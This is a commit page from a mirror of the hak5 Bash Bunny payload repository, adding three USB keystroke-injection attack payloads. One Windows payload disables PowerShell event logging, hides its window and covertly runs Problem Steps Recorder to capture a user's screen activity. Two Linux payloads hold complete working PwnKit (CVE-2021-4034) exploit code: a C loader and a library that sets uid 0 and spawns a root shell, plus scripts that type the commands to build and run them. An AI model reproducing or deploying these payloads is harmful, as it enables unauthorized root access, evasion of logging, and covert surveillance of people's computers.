hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/491/head
0iphor13 2022-02-02 09:18:55 +01:00 committed by GitHub
parent 4f57e587a1 1b8b6048f5
commit 75f1a54282
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
13 changed files with 550 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
payloads/library/credentials/win_problemstepsrecorder/README.md Normal file
View File

@ -0,0 +1,29 @@
# "Microsoft Windows" Problem Steps Recorder
- Title: Win_ProblemStepsRecorder
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Credentials
## Description
1) Partially avoids "PowerShell Script Block Logging".
2) Closing of all windows.
3) Hide "PowerShell" window.
4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
5) Writes the file system cache to disk.
6) Safely eject.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly RECORDER_TIME=300
```

50
payloads/library/credentials/win_problemstepsrecorder/payload.ps1 Normal file
View File

@ -0,0 +1,50 @@
#
# Author: TW-D
# Version: 1.0
#
Param (
[String] $BB_VOLUME,
[Int] $RECORDER_TIME
)
# Partially avoids "PowerShell Script Block Logging".
#
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
$etw_provider.SetValue($null, $event_provider)
# Closing of all windows.
#
Get-Process -Name "explorer" | Stop-Process
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
$bb_loot = "${BB_VOLUME}loot\"
$computer_name = $env:COMPUTERNAME
# Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
#
(C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
Start-Sleep -Seconds $RECORDER_TIME
(C:\Windows\System32\psr.exe /stop) | Out-Null
}
"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
# Writes the file system cache to disk.
#
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
# Safely eject.
#
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")

91
payloads/library/credentials/win_problemstepsrecorder/payload.txt Normal file
View File

@ -0,0 +1,91 @@
#!/bin/bash
#
# Title: Win_ProblemStepsRecorder
#
# Description:
# Abuse of "Windows Problem Steps Recorder"
# to spy on a user's activities.
#
# Author: TW-D
# Version: 1.0
# Category: Credentials
# Target: Since Microsoft Windows 7 and 2008 R2
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# NOTE
# ===============
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Cyan inverted single blink ...................... SPECIAL
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly RECORDER_TIME=300
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 7000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
Q ENTER
Q DELAY 3500
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 1500
Q STRING "CD \"\${BB_SWITCH}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
Q ENTER
Q DELAY 1500
LED SPECIAL
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
######## CLEANUP ########
LED CLEANUP
rm /root/udisk/loot/done.txt
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

21
payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c Normal file
View File

@ -0,0 +1,21 @@
#include <unistd.h>
int main() {
char * const ARGUMENTS[] = {
NULL
};
char * const ENVIRONMENT[] = {
"pwnkit.so:.",
"PATH=GCONV_PATH=.",
"SHELL=PWNKIT",
"CHARSET=PWNKIT",
NULL
};
execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
return(0);
}

24
payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c Normal file
View File

@ -0,0 +1,24 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void gconv() {}
void gconv_init() {
char * const ARGUMENTS[] = {
"/bin/sh",
NULL
};
char * const ENVIRONMENT[] = {
"PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
NULL
};
setuid(0);
setgid(0);
execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
exit(0);
}

26
payloads/library/execution/PwnKit_LPE/README.md Normal file
View File

@ -0,0 +1,26 @@
# PwnKit Vulnerability - Local Privilege Escalation
- Title: PwnKit Vulnerability - Local Privilege Escalation
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Execution
- Credits: Qualys Research Team
## Description
The Qualys Research Team has discovered a memory corruption vulnerability in polkits pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkits pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
```

112
payloads/library/execution/PwnKit_LPE/payload.txt Normal file
View File

@ -0,0 +1,112 @@
#!/bin/bash
#
# Title: PwnKit Vulnerability - Local Privilege Escalation
#
# Description:
# The Qualys Research Team has discovered a memory corruption
# vulnerability in polkits pkexec, a SUID-root program that
# is installed by default on every major Linux distribution.
#
# Author: TW-D
# Version: 1.0
# Category: Execution
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.3 LTS x86_64
# pkexec version 0.105
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
RUN UNITY xterm
Q DELAY 7000
LED STAGE2
Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
Q ENTER
Q DELAY 3500
Q STRING "mkdir /tmp/pwnkit_lpe/"
Q ENTER
Q DELAY 1500
Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
Q ENTER
Q DELAY 1500
Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
Q ENTER
Q DELAY 1500
Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
Q ENTER
Q DELAY 1500
Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "cd /tmp/pwnkit_lpe/"
Q ENTER
Q DELAY 1500
Q STRING "/usr/bin/pkexec --version"
Q ENTER
Q DELAY 1500
Q STRING "./pwnkit"
Q ENTER
Q DELAY 1500
Q STRING "id"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

21
payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c Normal file
View File

@ -0,0 +1,21 @@
#include <unistd.h>
int main() {
char * const ARGUMENTS[] = {
NULL
};
char * const ENVIRONMENT[] = {
"pwnkit.so:.",
"PATH=GCONV_PATH=.",
"SHELL=PWNKIT",
"CHARSET=PWNKIT",
NULL
};
execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
return(0);
}

24
payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c Normal file
View File

@ -0,0 +1,24 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void gconv() {}
void gconv_init() {
char * const ARGUMENTS[] = {
"/bin/sh",
NULL
};
char * const ENVIRONMENT[] = {
"PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
NULL
};
setuid(0);
setgid(0);
execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
exit(0);
}

BIN
payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit Executable file
View File

Binary file not shown.

BIN
payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so Executable file
View File

Binary file not shown.

36
payloads/library/execution/PwnKit_LPE_Compiled/README.md Normal file
View File

@ -0,0 +1,36 @@
# PwnKit Vulnerability - Local Privilege Escalation - Compiled
- Title: PwnKit Vulnerability - Local Privilege Escalation
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Execution
- Credits: Qualys Research Team
## Description
This is a version of the PwnKit Vulnerability Local Privilege Escalation containing pre-compiled binaries for x86_64 Linux. If you don't want to use the pre-compiled binaries or you are targetting a different architecture, please find the `PwnKit-LPE` directory.
The Qualys Research Team has discovered a memory corruption vulnerability in polkits pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkits pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
```
## Checksums
>
> 9e2c0af3d55192449760f1364a67f290554b98cdbe9ace9f84e6c33ea3e957eb ./CVE-2021-4034_files/pwnkit
>
> acd21bf70492d22317a4592551dcd4666a693b9622ddf952e63cf3ce288f3745 ./CVE-2021-4034_files/pwnkit.so
>

116
payloads/library/execution/PwnKit_LPE_Compiled/payload.txt Normal file
View File

@ -0,0 +1,116 @@
#!/bin/bash
#
# Title: PwnKit Vulnerability - Local Privilege Escalation
#
# Description:
# The Qualys Research Team has discovered a memory corruption
# vulnerability in polkits pkexec, a SUID-root program that
# is installed by default on every major Linux distribution.
#
# Author: TW-D
# Version: 1.0
# Category: Execution
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.3 LTS x86_64
# pkexec version 0.105
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
RUN UNITY xterm
Q DELAY 7000
LED STAGE2
Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
Q ENTER
Q DELAY 3500
Q STRING "mkdir /tmp/pwnkit_lpe/"
Q ENTER
Q DELAY 1500
Q STRING "cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so"
Q ENTER
Q DELAY 1500
Q STRING "cp pwnkit /tmp/pwnkit_lpe/pwnkit"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
Q ENTER
Q DELAY 1500
Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
Q ENTER
Q DELAY 1500
Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "cd /tmp/pwnkit_lpe/"
Q ENTER
Q DELAY 1500
Q STRING "/usr/bin/pkexec --version"
Q ENTER
Q DELAY 1500
Q STRING "chmod +x ./pwnkit"
Q ENTER
Q DELAY 1500
Q STRING "./pwnkit"
Q ENTER
Q DELAY 1500
Q STRING "id"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0